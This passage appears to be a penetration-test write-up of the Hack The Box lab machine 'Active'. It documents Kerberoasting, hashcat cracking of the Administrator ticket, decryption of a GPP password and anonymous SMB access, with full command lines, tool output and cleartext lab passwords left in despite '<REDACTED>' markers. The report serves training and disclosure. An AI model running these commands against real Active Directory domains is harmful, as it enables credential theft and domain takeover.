Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 514 MB (18447 MB free)
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$cde901693328b44d6e9ff2f6b5f954fc$362b951ec8f18154a9b754c6421ea68e61ab4ab3b7775d1c6206693f9741ed64113cdcb8751964044eefc4a3be8ff6a260af4336bcfe072e36c724e9a2f34f2115676e37ce6e43608eef6f13f7c795db9c04ad689cb0d486d8842efa41d06a30c0909bf249f6e8726fbfacd3e4f3cd07e36ff920ddcb8fa0be870c76932681ffbb10c8d6469d059a3aeb2680a930e463400693ffd75356b73a903178d451285373e42a155bf3f59adf868a16ed271f691add1c791107415afd2e3fa2530cff11b0fff8cff4526a67af3cb71adb296bfae9a461cba75d488605f0b4f4cffdce0eceeaf148f5a371cb56bdf963406109bfd25e0071534e84e7020a6cb2e2c823bfdfbce0a528810fefb70dcce03328a910e16737019f36a24a35e9d3df7e6c1279ff27f9e0a695148178d0246f0af177b33d68f1de4f23474f3f7ab8b350017928e28b785f279b0e49b4ef061cb517d1f1ef0c0ef6b147303a07b8317c8dfc5b9c40cd35f4f1e4c17f24682cdaab2f3d3212bfda53e3011b5e8e29a48604381bf3ca3c1c65223f1099e389a5354603d14aaf5b9557bb6b1330790cd3000f34d63960dff7792382b2ecf9064fa6bf69392a245f0053e961ce84496594366a8fc0c8e77c875f8432ae606969a22c032f1012c2d017417e6cca83522efea84e57f82f75891cd77c49fd0b6d81c00cacb56e389fd6a407404e65dbfffd6b789f3f2d9b70502d121ecbb2a49d5af7c902c5379825bd8961cd63760ebdba1e6f060524848a2063b2ac438e47261bec70b4ecbc10c1b2d62779a415b19339cc6087dbf42c3cf3d846920dcf8866be2e6538e863e7dc589fe558b80d868f55c61ca204f70c3d0a7d996aa736c5176cacbcc806bed9d23f7fbee37eb01a93b05280085dbcb45884654feb8ad9ffd975d7c08a9f39e2d93822a1124861ea4b858956612985acff535e69c760f2557788d384880128ece7f77a8c94fc84282752a07829a54480bfffd721488f4138ccdb0976b2eda786a3f497e4adb6245c5584c78c1c15eb401d2c07a379cfc8bcbd5558a53f884a6ddfc46e40409839d5736eee2dd5e2df2d5bdaa46a4973b7f7bf1f675b2f0edab214b8d352776d3e89768eed2782a6eea449427766b4da14bcfc7cee131f330fbcc2baf371066ece8c301317d3353fc33013fb3e3031412daf977a8499d9bfdaf5a9455d304df83c364db4002f8d067a08e1d201481644554955d0330bfc49897fe1d83b18132e67c2efe2:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Ad...c2efe2
Time.Started.....: Fri Jan 9 09:05:15 2026 (7 secs)
Time.Estimated...: Fri Jan 9 09:05:22 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1697.1 kH/s (2.04ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10547200/14344385 (73.53%)
Rejected.........: 0/10547200 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Tiffany95 -> Tahlia2003
Hardware.Mon.#01.: Util: 25%
Started: Fri Jan 9 09:05:12 2026
Stopped: Fri Jan 9 09:05:22 2026The cleartext password for the Domain Administrator was successfully recovered: <REDACTED>.
4.3. Credential Administrator Access
Final goal the root flag (root.txt) was achieved by using smbmap again but with the Administrator account. The assessor traversed the Administrator users Users share access to find the root.txt file.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -d active.htb -u Administrator -p <REDACTED> -r Users/Administrator/Desktop
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[!] Unable to remove test file at \\10.10.10.100\SYSVOL\ZDXULHMFEI.txt, please remove manually
[+] IP: 10.10.10.100:445 Name: active.htb Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
./UsersAdministrator/Desktop
dw--w--w-- 0 Thu Jan 21 11:49:46 2021 .
dw--w--w-- 0 Thu Jan 21 11:49:46 2021 ..
fr--r--r-- 282 Mon Jul 30 09:50:10 2018 desktop.ini
fw--w--w-- 34 Fri Jan 9 06:35:45 2026 root.txt
[*] Closed 1 connectionsThe found root.txt file was then downloaded using the same technique as previously executed.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -d active.htb -u Administrator -p <REDACTED> --download ./Users/Administrator/Desktop/root.txt
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Users\Administrator\Desktop\root.txt (34 bytes)
[+] File output to: /home/kali/active/10.10.10.100-Users_Administrator_Desktop_root.txt
[*] Closed 1 connections~/active [10.10.14.74]
> \cat 10.10.10.100-Users_Administrator_Desktop_root.txt
84e80b08a4ea58c2db1a70cb68ccb1b0Technical Findings
1. Weak Kerberos Authentication - High
| CWE | CWE-522: Insufficiently Protected Credentials |
| CVSS 3.1 Score | 8.8 (High) |
| Description | The Administrator account was identified as having a Service Principal Name (SPN) associated with it. In an Active Directory environment, any authenticated user can request a Kerberos service ticket (TGS) for any account with an SPN. These tickets are encrypted using the NTLM hash of the service account. Because the Administrator account is highly privileged, it becomes a primary target for Kerberoasting. |
| Security Impact | The assessor was able to request a TGS ticket for the Domain Administrator and extract the encrypted hash. By subjecting this hash to an offline brute-force attack, the assessor recovered the cleartext password. This led to a total domain compromise, granting the tester full administrative control over the Domain Controller and all organisational data. |
| Affected Domain |
|
| Remediation |
|
| External References |
Finding Evidence:
~/active [10.10.14.74]
> nxc ldap active.htb -u SVC_TGS -p <REDACTED> --kerberoasting nxc_kerb.list
LDAP 10.10.10.100 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb)
LDAP 10.10.10.100 389 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
LDAP 10.10.10.100 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.10.10.100 389 DC [*] Total of records returned 1
LDAP 10.10.10.100 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-18 15:06:40.351723, lastLogon: 2026-01-09 06:35:47.140954
LDAP 10.10.10.100 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$cde901693328b44d6e9ff2f6b5f954fc$362b951ec8f18154a9b754c6421ea68e61ab4ab3b7775d1c6206693f9741ed64113cdcb8751964044eefc4a3be8ff6a260af4336bcfe072e36c724e9a2f34f2115676e37ce6e43608eef6f13f7c795db9c04ad689cb0d486d8842efa41d06a30c0909bf249f6e8726fbfacd3e4f3cd07e36ff920ddcb8fa0be870c76932681ffbb10c8d6469d059a3aeb2680a930e463400693ffd75356b73a903178d451285373e42a155bf3f59adf868a16ed271f691add1c791107415afd2e3fa2530cff11b0fff8cff4526a67af3cb71adb296bfae9a461cba75d488605f0b4f4cffdce0eceeaf148f5a371cb56bdf963406109bfd25e0071534e84e7020a6cb2e2c823bfdfbce0a528810fefb70dcce03328a910e16737019f36a24a35e9d3df7e6c1279ff27f9e0a695148178d0246f0af177b33d68f1de4f23474f3f7ab8b350017928e28b785f279b0e49b4ef061cb517d1f1ef0c0ef6b147303a07b8317c8dfc5b9c40cd35f4f1e4c17f24682cdaab2f3d3212bfda53e3011b5e8e29a48604381bf3ca3c1c65223f1099e389a5354603d14aaf5b9557bb6b1330790cd3000f34d63960dff7792382b2ecf9064fa6bf69392a245f0053e961ce84496594366a8fc0c8e77c875f8432ae606969a22c032f1012c2d017417e6cca83522efea84e57f82f75891cd77c49fd0b6d81c00cacb56e389fd6a407404e65dbfffd6b789f3f2d9b70502d121ecbb2a49d5af7c902c5379825bd8961cd63760ebdba1e6f060524848a2063b2ac438e47261bec70b4ecbc10c1b2d62779a415b19339cc6087dbf42c3cf3d846920dcf8866be2e6538e863e7dc589fe558b80d868f55c61ca204f70c3d0a7d996aa736c5176cacbcc806bed9d23f7fbee37eb01a93b05280085dbcb45884654feb8ad9ffd975d7c08a9f39e2d93822a1124861ea4b858956612985acff535e69c760f2557788d384880128ece7f77a8c94fc84282752a07829a54480bfffd721488f4138ccdb0976b2eda786a3f497e4adb6245c5584c78c1c15eb401d2c07a379cfc8bcbd5558a53f884a6ddfc46e40409839d5736eee2dd5e2df2d5bdaa46a4973b7f7bf1f675b2f0edab214b8d352776d3e89768eed2782a6eea449427766b4da14bcfc7cee131f330fbcc2baf371066ece8c301317d3353fc33013fb3e3031412daf977a8499d9bfdaf5a9455d304df83c364db4002f8d067a08e1d201481644554955d0330bfc49897fe1d83b18132e67c2efe22. Insecure Storage of Credentials (GPP) - High
| CWE | CWE-522: Insufficiently Protected Credentials |
| CVSS 3.1 Score | 7.5 (High) |
| Description | During the enumeration of the Replication share, a Group Policy Preferences (GPP) configuration file named Groups.xml was discovered. This file contained a cpassword attribute, which is an AES-256 encrypted version of a user's password. However, Microsoft published the static AES key required to decrypt these strings, meaning any user with read access to the SYSVOL or Replication shares can retrieve the plaintext credentials. |
| Security Impact | The tester decrypted the cpassword for the active.htb\SVC_TGS account. This provided the initial foothold into the domain, allowing the tester to perform credentialed enumeration and launch the Kerberoasting attack that ultimately led to domain compromise. |
| Affected Domain |
|
| Remediation |
|
| External References |
Finding Evidence:
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 --download ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/kali/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
[*] Closed 1 connections3. Anonymous SMB Share Access - Medium
| CWE | CWE-284: Improper Access Control |
| CVSS 3.1 Score | 5.3 (Medium) |
| Description | The SMB server on the Domain Controller was found to allow anonymous login (NULL sessions). This configuration is often a legacy remnant from older Windows Server versions that were upgraded in place without hardening. |
| Security Impact | This misconfiguration allowed the tester to list and read available network shares without providing valid credentials. Specifically, the tester gained read access to the Replication share, which directly facilitated the discovery of sensitive GPP configuration files containing encrypted passwords. |
| Affected Domain |
|
| Remediation |
|
| External References |
Finding Evidence:
~/active [10.10.14.74]
> smbclient -L //10.10.10.100
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available